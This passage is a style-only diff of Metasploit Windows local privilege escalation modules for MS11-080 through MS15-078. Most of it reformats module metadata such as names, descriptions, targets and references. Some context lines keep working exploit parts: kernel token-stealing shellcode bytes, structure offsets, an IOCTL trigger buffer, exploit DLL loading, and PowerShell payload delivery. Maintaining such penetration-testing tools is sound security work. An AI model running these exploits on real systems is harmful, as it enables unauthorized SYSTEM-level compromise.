+                '_KPROCESS' => "\x44",
+                '_TOKEN' => "\xc8",
+                '_UPID' => "\x84",
+                '_APLINKS' => "\x88"
+              }
+            ],
+            [
+              'Windows Server 2003 SP2',
+              {
+                'HaliQuerySystemInfo' => 0x1fa1e,
+                'HalpSetSystemInformation' => 0x21c60,
+                '_KPROCESS' => "\x38",
+                '_TOKEN' => "\xd8",
+                '_UPID' => "\x94",
+                '_APLINKS' => "\x98"
+              }
+            ]
+          ],
+          'References' => [
+            %w(CVE 2011-2005),
+            %w(OSVDB 76232),
+            %w(EDB 18176),
+            %w(MSB MS11-080),
+            %w(URL http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/)
+          ],
+          'DisclosureDate' => '2011-11-30',
+          'DefaultTarget' => 0,
+          'Notes' => {
+            'Stability' => [ CRASH_OS_RESTARTS, ],
+          },
+        }
+      )
+    )
   end
 
   # Function borrowed from smart_hashdump
@@ -96,6 +97,7 @@ class MetasploitModule < Msf::Exploit::Local
       next if p['pid'] == session.sys.process.getpid
       next if p['pid'] == 4
       next if p['user'] != system_account_name
+
       return p
     end
   end
@@ -132,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Local
     result = session.railgun.ws2_32.WSASocketA('AF_INET', 'SOCK_STREAM', 'IPPROTO_TCP', nil, nil, 0)
     socket = result['return']
 
-    irpstuff =  rand_text_alpha(8)
+    irpstuff = rand_text_alpha(8)
     irpstuff << "\x00\x00\x00\x00"
     irpstuff << rand_text_alpha(4)
     irpstuff << "\x01\x00\x00\x00"
@@ -163,13 +165,13 @@ class MetasploitModule < Msf::Exploit::Local
     padding = make_nops(2)
     backup_token = 0x20900
 
-    restore_ptrs =  "\x31\xc0"
+    restore_ptrs = "\x31\xc0"
     restore_ptrs << "\xb8" + [hal_psetsysteminformation].pack('V')
     restore_ptrs << "\xa3" + [haldispatchtable + 8].pack('V')
     restore_ptrs << "\xb8" + [hal_iquerysysteminformation].pack('V')
     restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V')
 
-    restore_token =  "\x52"
+    restore_token = "\x52"
     restore_token << "\x33\xc0"
     restore_token << "\x64\x8b\x80\x24\x01\x00\x00"
     restore_token << "\x8b\x40" + mytarget['_KPROCESS']

--- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
+++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -12,61 +12,59 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::FileDropper
   include Msf::Post::File
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'		=> 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
-      'Description'	=> %q{
-        Due to a problem with isolating window broadcast messages in the Windows kernel,
-        an attacker can broadcast commands from a lower Integrity Level process to a
-        higher Integrity Level process, thereby effecting a privilege escalation. This
-        issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and
-        RT. Note that spawning a command prompt with the shortcut key combination Win+Shift+#
-        does not work in Vista, so the attacker will have to check if the user is already
-        running a command prompt and set SPAWN_PROMPT false.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'	=> 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
+        'Description'	=> %q{
+          Due to a problem with isolating window broadcast messages in the Windows kernel,
+          an attacker can broadcast commands from a lower Integrity Level process to a
+          higher Integrity Level process, thereby effecting a privilege escalation. This
+          issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and
+          RT. Note that spawning a command prompt with the shortcut key combination Win+Shift+#
+          does not work in Vista, so the attacker will have to check if the user is already
+          running a command prompt and set SPAWN_PROMPT false.
 
-        Three exploit techniques are available with this module. The WEB technique will
-        execute a powershell encoded payload from a Web location.  The FILE technique
-        will drop an executable to the file system, set it to medium integrity and execute
-        it. The TYPE technique will attempt to execute a powershell encoded payload directly
-        from the command line, but may take some time to complete.
-      },
-      'License'	=> MSF_LICENSE,
-      'Author'	=>
-        [
+          Three exploit techniques are available with this module. The WEB technique will
+          execute a powershell encoded payload from a Web location.  The FILE technique
+          will drop an executable to the file system, set it to medium integrity and execute
+          it. The TYPE technique will attempt to execute a powershell encoded payload directly
+          from the command line, but may take some time to complete.
+        },
+        'License'	=> MSF_LICENSE,
+        'Author' => [
           'Tavis Ormandy', # Discovery
-          'Axel Souchet',  # @0vercl0k POC
+          'Axel Souchet', # @0vercl0k POC
           'Ben Campbell' # Metasploit module
         ],
-      'Platform'	=> [ 'win' ],
-      'SessionTypes'	=> [ 'meterpreter' ],
-      'Targets'	=>
-      [
-        [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
-        [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
-      ],
-      'DefaultTarget' => 0,
-      'DefaultOptions' =>
-        {
+        'Platform'	=> [ 'win' ],
+        'SessionTypes'	=> [ 'meterpreter' ],
+        'Targets' => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
           'WfsDelay' => 40,
         },
-      'DisclosureDate' => '2012-11-27',
-      'References' =>
-        [
+        'DisclosureDate' => '2012-11-27',
+        'References' => [
           [ 'CVE', '2013-0008' ],
           [ 'MSB', 'MS13-005' ],
           [ 'OSVDB', '88966'],
           [ 'URL', 'http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html' ]
         ]
-    ))
+      )
+    )
 
     register_options(
       [
         OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]),
-        OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]),
+        OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB', 'FILE', 'TYPE']]),
         OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])
       ], self.class
     )
-
   end
 
   def low_integrity_level?
@@ -129,10 +127,10 @@ class MetasploitModule < Msf::Exploit::Local
     # integrity process can write.
     drop_to_fs = false
     if datastore['TECHNIQUE'] == 'FILE'
-      payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
+      payload_file = "#{rand_text_alpha(5 + rand(3))}.exe"
       begin
         tmp_dir = session.sys.config.getenv('TEMP')
-        tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
+        tmp_dir << "\\Low" unless tmp_dir[-3, 3] =~ /Low/i
         cd(tmp_dir)
         print_status("Trying to drop payload to #{tmp_dir}...")
         if write_file(payload_file, generate_payload_exe)
@@ -189,7 +187,7 @@ class MetasploitModule < Msf::Exploit::Local
       # Spawn low integrity cmd.exe
       print_status("Spawning Low Integrity Cmd Prompt")
       windir = session.sys.config.getenv('windir')
-      li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
+      li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, { 'Hidden' => false }).pid
 
       count = count_cmd_procs
       spawned = false
@@ -228,4 +226,3 @@ class MetasploitModule < Msf::Exploit::Local
     send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
   end
 end
-

--- a/modules/exploits/windows/local/ms13_053_schlamperei.rb
+++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = AverageRanking
 
@@ -13,49 +12,49 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::FileInfo
   include Msf::Post::Windows::ReflectiveDLLInjection
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'           => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
-      'Description'    => %q{
-        This module leverages a kernel pool overflow in Win32k which allows local privilege escalation.
-        The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
-        This allows any unprivileged process to freely migrate to winlogon.exe, achieving
-        privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox.
-        NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-           'Nils', #Original Exploit
-           'Jon', #Original Exploit
-           'Donato Capitella <donato.capitella[at]mwrinfosecurity.com>', # Metasploit Conversion
-           'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' # Help and Encouragement ;)
-        ],
-      'Arch'           => ARCH_X86,
-      'Platform'       => 'win',
-      'SessionTypes'   => [ 'meterpreter' ],
-      'DefaultOptions' =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC' => 'thread',
-        },
-      'Targets'        =>
-        [
-          [ 'Windows 7 SP0/SP1', { } ]
-        ],
-      'Payload'        =>
-        {
-          'Space'       => 4096,
-          'DisableNops' => true
-        },
-      'References'     =>
-        [
-          [ 'CVE', '2013-1300' ],
-          [ 'MSB', 'MS13-053' ],
-          [ 'URL', 'https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/' ]
-        ],
-      'DisclosureDate' => '2013-12-01',
-      'DefaultTarget'  => 0
-    }))
+          'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
+          'Description' => %q{
+            This module leverages a kernel pool overflow in Win32k which allows local privilege escalation.
+            The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
+            This allows any unprivileged process to freely migrate to winlogon.exe, achieving
+            privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox.
+            NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Nils', # Original Exploit
+            'Jon', # Original Exploit
+            'Donato Capitella <donato.capitella[at]mwrinfosecurity.com>', # Metasploit Conversion
+            'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' # Help and Encouragement ;)
+          ],
+          'Arch' => ARCH_X86,
+          'Platform' => 'win',
+          'SessionTypes' => [ 'meterpreter' ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+          },
+          'Targets' => [
+            [ 'Windows 7 SP0/SP1', {} ]
+          ],
+          'Payload' => {
+            'Space' => 4096,
+            'DisableNops' => true
+          },
+          'References' => [
+            [ 'CVE', '2013-1300' ],
+            [ 'MSB', 'MS13-053' ],
+            [ 'URL', 'https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/' ]
+          ],
+          'DisclosureDate' => '2013-12-01',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def check
@@ -80,7 +79,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
     return Exploit::CheckCode::Safe
   end
-
 
   def exploit
     if is_system?
@@ -131,4 +129,3 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 end
-

--- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
+++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
@@ -11,45 +11,46 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::Remote::HttpServer
   include Msf::Post::Windows::Priv
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'           => 'MS13-097 Registry Symlink IE Sandbox Escape',
-      'Description'	   => %q{
-        This module exploits a vulnerability in Internet Explorer Sandbox which allows to
-        escape the Enhanced Protected Mode and execute code with Medium Integrity. The
-        vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll
-        component, which can be abused to force medium integrity IE to user influenced keys.
-        By using registry symlinks it's possible force IE to add a policy entry in the registry
-        and finally bypass Enhanced Protected Mode.
-      },
-      'License'	       => MSF_LICENSE,
-      'Author'	       =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'MS13-097 Registry Symlink IE Sandbox Escape',
+        'Description'	=> %q{
+          This module exploits a vulnerability in Internet Explorer Sandbox which allows to
+          escape the Enhanced Protected Mode and execute code with Medium Integrity. The
+          vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll
+          component, which can be abused to force medium integrity IE to user influenced keys.
+          By using registry symlinks it's possible force IE to add a policy entry in the registry
+          and finally bypass Enhanced Protected Mode.
+        },
+        'License'	=> MSF_LICENSE,
+        'Author' => [
           'James Forshaw', # Vulnerability Discovery and original exploit code
           'juan vazquez' # metasploit module
         ],
-      'Platform'	     => [ 'win' ],
-      'SessionTypes'   => [ 'meterpreter' ],
-      'Stance'         => Msf::Exploit::Stance::Aggressive,
-      'Targets'	       =>
-        [
-          [ 'IE 8 - 11', { } ]
+        'Platform'	=> [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Targets' => [
+          [ 'IE 8 - 11', {} ]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2013-12-10',
-      'References'     =>
-        [
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2013-12-10',
+        'References' => [
           ['CVE', '2013-5045'],
           ['MSB', 'MS13-097'],
           ['BID', '64115'],
           ['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
         ]
-    ))
+      )
+    )
 
     register_options(
       [
         OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
-      ])
+      ]
+    )
   end
 
   def exploit
@@ -78,10 +79,9 @@ class MetasploitModule < Msf::Exploit::Local
                           payload_instance.arch.first,
                           {
                             :remove_comspec => true
-                          }
-                         )
+                          })
 
-    cmd.gsub!('powershell.exe ','')
+    cmd.gsub!('powershell.exe ', '')
     session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd)
 
     html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"
@@ -93,25 +93,25 @@ class MetasploitModule < Msf::Exploit::Local
 
     session.core.load_library(
       'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-5045", "CVE-2013-5045.dll"),
-      'TargetFilePath'  => temp +  "\\CVE-2013-5045.dll",
-      'UploadLibrary'   => true,
-      'Extension'       => false,
-      'SaveToDisk'      => false
+      'TargetFilePath' => temp + "\\CVE-2013-5045.dll",
+      'UploadLibrary' => true,
+      'Extension' => false,
+      'SaveToDisk' => false
     )
   end
 
   def on_request_uri(cli, request)
     if request.uri =~ /\.html$/
       print_status("Sending window close html...")
-      close_html = <<-eos
-<html>
-<body>
-<script>
-window.open('', '_self', '');
-window.close();
-</script>
-</body>
-</html>
+      close_html = <<~eos
+        <html>
+        <body>
+        <script>
+        window.open('', '_self', '');
+        window.close();
+        </script>
+        </body>
+        </html>
       eos
       send_response(cli, close_html, { 'Content-Type' => 'text/html' })
     else
@@ -119,4 +119,3 @@ window.close();
     end
   end
 end
-

--- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
+++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
@@ -23,40 +23,39 @@ class MetasploitModule < Msf::Exploit::Local
     }
   }
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'		=> 'MS14-009 .NET Deployment Service IE Sandbox Escape',
-      'Description'	=> %q{
-        This module abuses a process creation policy in Internet Explorer's sandbox, specifically
-        in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the
-        Enhanced Protected Mode, and execute code with Medium Integrity.
-      },
-      'License'	=> MSF_LICENSE,
-      'Author'	=>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'	=> 'MS14-009 .NET Deployment Service IE Sandbox Escape',
+        'Description'	=> %q{
+          This module abuses a process creation policy in Internet Explorer's sandbox, specifically
+          in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the
+          Enhanced Protected Mode, and execute code with Medium Integrity.
+        },
+        'License'	=> MSF_LICENSE,
+        'Author' => [
           'James Forshaw', # Vulnerability Discovery and original exploit code
           'juan vazquez' # metasploit module
         ],
-      'Platform'	    => [ 'win' ],
-      'SessionTypes'	=> [ 'meterpreter' ],
-      'Targets'	=>
-        [
-          [ 'IE 8 - 11', { } ]
+        'Platform'	=> [ 'win' ],
+        'SessionTypes'	=> [ 'meterpreter' ],
+        'Targets' => [
+          [ 'IE 8 - 11', {} ]
         ],
-      'DefaultTarget' => 0,
-      'DefaultOptions'  =>
-        {
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
           'WfsDelay' => 30
         },
-      'DisclosureDate'=> '2014-02-11',
-      'References' =>
-        [
+        'DisclosureDate' => '2014-02-11',
+        'References' => [
           ['CVE', '2014-0257'],
           ['MSB', 'MS14-009'],
           ['BID', '65417'],
           ['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
         ]
-    ))
+      )
+    )
   end
 
   def check
@@ -89,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Local
     dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
     dfsvc_version = dfsvc_version.join(".")
 
-    NET_VERSIONS.each do |k,v|
+    NET_VERSIONS.each do |k, v|
       if v["dfsvc"] == dfsvc_version
         net_version = k
       end
@@ -147,10 +146,9 @@ class MetasploitModule < Msf::Exploit::Local
                           payload_instance.arch.first,
                           {
                             :remove_comspec => true
-                          }
-                         )
+                          })
 
-    cmd.gsub!('powershell.exe ','')
+    cmd.gsub!('powershell.exe ', '')
     session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
 
     temp = get_env('TEMP')
@@ -158,11 +156,11 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Loading Exploit Library...")
 
     session.core.load_library(
-        'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
-        'TargetFilePath'  => temp +  "\\CVE-2014-0257.dll",
-        'UploadLibrary'   => true,
-        'Extension'       => false,
-        'SaveToDisk'      => false
+      'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
+      'TargetFilePath' => temp + "\\CVE-2014-0257.dll",
+      'UploadLibrary' => true,
+      'Extension' => false,
+      'SaveToDisk' => false
     )
   end
 
@@ -171,4 +169,3 @@ class MetasploitModule < Msf::Exploit::Local
     super
   end
 end
-

--- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
+++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = AverageRanking
 
@@ -13,51 +12,52 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'           => 'MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference',
-      'Description'    => %q{
-        A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys
-        can allow a local attacker to trigger a NULL pointer dereference by using a
-        specially crafted IOCTL. This flaw can be abused to elevate privileges to
-        SYSTEM.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        =>
-        [
-          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
-          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
-        ],
-      'Arch'          => ARCH_X86,
-      'Platform'      => 'win',
-      'SessionTypes'  => [ 'meterpreter' ],
-      'DefaultOptions' =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC' => 'thread',
-        },
-      'Targets'       =>
-        [
-          ['Windows Server 2003 SP2',
-            {
-              '_KPROCESS' => "\x38",
-              '_TOKEN' => "\xd8",
-              '_UPID' => "\x94",
-              '_APLINKS' => "\x98"
-            }
-          ]
-        ],
-      'References'    =>
-        [
-          ['CVE', '2014-4076'],
-          ['MSB', 'MS14-070'],
-          ['OSVDB', '114532'],
-          ['URL', 'https://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev'],
-          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt']
-        ],
-      'DisclosureDate'=> '2014-11-11',
-      'DefaultTarget' => 0
-    }))
-
+          'Name' => 'MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference',
+          'Description' => %q{
+            A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys
+            can allow a local attacker to trigger a NULL pointer dereference by using a
+            specially crafted IOCTL. This flaw can be abused to elevate privileges to
+            SYSTEM.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
+            'Jay Smith <jsmith[at]korelogic.com>' # MSF module
+          ],
+          'Arch' => ARCH_X86,
+          'Platform' => 'win',
+          'SessionTypes' => [ 'meterpreter' ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+          },
+          'Targets' => [
+            [
+              'Windows Server 2003 SP2',
+              {
+                '_KPROCESS' => "\x38",
+                '_TOKEN' => "\xd8",
+                '_UPID' => "\x94",
+                '_APLINKS' => "\x98"
+              }
+            ]
+          ],
+          'References' => [
+            ['CVE', '2014-4076'],
+            ['MSB', 'MS14-070'],
+            ['OSVDB', '114532'],
+            ['URL', 'https://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev'],
+            ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt']
+          ],
+          'DisclosureDate' => '2014-11-11',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def check
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
 
-    sc  = token_stealing_shellcode(target, nil, nil, false)
+    sc = token_stealing_shellcode(target, nil, nil, false)
     # move up the stack frames looking for nt!KiSystemServicePostCall
     sc << "\x31\xc9"                     # xor ecx, ecx
     sc << "\x89\xeb"                     # mov ebx, ebp
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     print_status("Triggering the vulnerability...")
     session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
-    #session.railgun.kernel32.CloseHandle(handle) # CloseHandle will never return, so skip it
+    # session.railgun.kernel32.CloseHandle(handle) # CloseHandle will never return, so skip it
 
     print_status("Checking privileges after exploitation...")
 

--- a/modules/exploits/windows/local/ms15_004_tswbproxy.rb
+++ b/modules/exploits/windows/local/ms15_004_tswbproxy.rb
@@ -11,55 +11,56 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::Powershell
   include Msf::Post::Windows::ReflectiveDLLInjection
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'           => 'MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape',
-      'Description'    => %q{
-        This module abuses a process creation policy in Internet Explorer's
-        sandbox; specifically, Microsoft's RemoteApp and Desktop Connections runtime
-        proxy, TSWbPrxy.exe.  This vulnerability allows the attacker to escape the
-        Protected Mode and execute code with Medium Integrity. At the moment, this
-        module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This
-        module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE
-        11.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Unknown', # From Threat Intel of Symantec
-          'Henry Li', # Public vulnerability analysis
-          'juan vazquez' # Metasploit module
-        ],
-      'Platform'       => 'win',
-      'SessionTypes'   => ['meterpreter'],
-      'Arch'           => [ARCH_X86],
-      'DefaultOptions' =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC' => 'thread',
-          'WfsDelay' => 30
-        },
-      'Targets'        =>
-        [
-          [ 'Protected Mode (Windows 7) / 32 bits',
-            {
-              'Arch' => ARCH_X86
-            }
-          ]
-        ],
-      'DefaultTarget'  => 0,
-      'Payload'        =>
-        {
-          'Space'       => 4096,
-          'DisableNops' => true
-        },
-      'References'     =>
-        [
-          ['CVE', '2015-0016'],
-          ['MSB', 'MS15-004'],
-          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/']
-        ],
-      'DisclosureDate' => '2015-01-13'
-    }))
+          'Name' => 'MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape',
+          'Description' => %q{
+            This module abuses a process creation policy in Internet Explorer's
+            sandbox; specifically, Microsoft's RemoteApp and Desktop Connections runtime
+            proxy, TSWbPrxy.exe.  This vulnerability allows the attacker to escape the
+            Protected Mode and execute code with Medium Integrity. At the moment, this
+            module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This
+            module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE
+            11.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Unknown', # From Threat Intel of Symantec
+            'Henry Li', # Public vulnerability analysis
+            'juan vazquez' # Metasploit module
+          ],
+          'Platform' => 'win',
+          'SessionTypes' => ['meterpreter'],
+          'Arch' => [ARCH_X86],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+            'WfsDelay' => 30
+          },
+          'Targets' => [
+            [
+              'Protected Mode (Windows 7) / 32 bits',
+              {
+                'Arch' => ARCH_X86
+              }
+            ]
+          ],
+          'DefaultTarget' => 0,
+          'Payload' => {
+            'Space' => 4096,
+            'DisableNops' => true
+          },
+          'References' => [
+            ['CVE', '2015-0016'],
+            ['MSB', 'MS15-004'],
+            ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/']
+          ],
+          'DisclosureDate' => '2015-01-13'
+        }
+      )
+    )
   end
 
   def check
@@ -107,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Local
     )
 
     print_status('Storing payload on environment variable...')
-    cmd.gsub!('powershell.exe ','')
+    cmd.gsub!('powershell.exe ', '')
     session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', cmd)
 
     print_status('Exploiting...')

--- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
+++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ManualRanking
 
@@ -29,48 +28,53 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::FileInfo
   include Msf::Post::Windows::ReflectiveDLLInjection
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'            => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow',
-      'Description'     => %q{
-        This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
-        a malformed font. The vulnerability was exploited by the hacking team and disclosed in
-        the July data leak. This module has been tested successfully on vulnerable builds of
-        Windows 8.1 x64.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          => [
-          'Eugene Ching',    # vulnerability discovery and exploit
-          'Mateusz Jurczyk', # vulnerability discovery
-          'Cedric Halbronn', # vulnerability and exploit analysis
-          'juan vazquez'     # msf module
-        ],
-      'Arch'            => ARCH_X64,
-      'Platform'        => 'win',
-      'SessionTypes'    => [ 'meterpreter' ],
-      'DefaultOptions'  => {
-          'EXITFUNC'    => 'thread',
-        },
-      'Targets'         => [
-          [ 'Windows 8.1 x64',  { } ]
-        ],
-      'Payload'         => {
-          'Space'       => 4096,
-          'DisableNops' => true
-        },
-      'References'      => [
-          ['CVE', '2015-2426'],
-          ['CVE', '2015-2433'],
-          ['MSB', 'MS15-078'],
-          ['MSB', 'MS15-080'],
-          ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
-          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
-          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'],
-          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480']
-        ],
-      'DisclosureDate'  => '2015-07-11',
-      'DefaultTarget'   => 0
-    }))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        {
+          'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow',
+          'Description' => %q{
+            This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
+            a malformed font. The vulnerability was exploited by the hacking team and disclosed in
+            the July data leak. This module has been tested successfully on vulnerable builds of
+            Windows 8.1 x64.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Eugene Ching', # vulnerability discovery and exploit
+            'Mateusz Jurczyk', # vulnerability discovery
+            'Cedric Halbronn', # vulnerability and exploit analysis
+            'juan vazquez'     # msf module
+          ],
+          'Arch' => ARCH_X64,
+          'Platform' => 'win',
+          'SessionTypes' => [ 'meterpreter' ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+          },
+          'Targets' => [
+            [ 'Windows 8.1 x64', {} ]
+          ],
+          'Payload' => {
+            'Space' => 4096,
+            'DisableNops' => true
+          },
+          'References' => [
+            ['CVE', '2015-2426'],
+            ['CVE', '2015-2433'],
+            ['MSB', 'MS15-078'],
+            ['MSB', 'MS15-080'],
+            ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
